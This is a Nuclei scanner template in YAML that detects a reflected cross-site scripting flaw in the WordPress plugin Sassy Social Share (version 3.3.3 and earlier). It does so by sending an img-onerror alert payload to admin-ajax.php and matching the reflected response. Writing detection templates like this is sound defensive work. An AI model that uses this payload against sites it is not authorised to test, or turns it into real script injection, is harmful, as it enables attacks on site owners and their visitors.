nuclei-templates/vulnerabilities/wordpress/sassy-social-share.yaml

19 lines
604 B
YAML

id: sassy-social-share-xss
info:
name: Sassy Social Share XSS
author: Random_Robbie
severity: medium
description: Sassy Social Share <= 3.3.3 - Cross-Site Scripting (XSS)
tags: wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]="
matchers-condition: and
matchers:
- type: word
words:
- '{"facebook_urls":[{"<img src=x onerror=alert(document.domain)>":""}],"status":1,"message":{"":{"twitter":0}}}'
part: body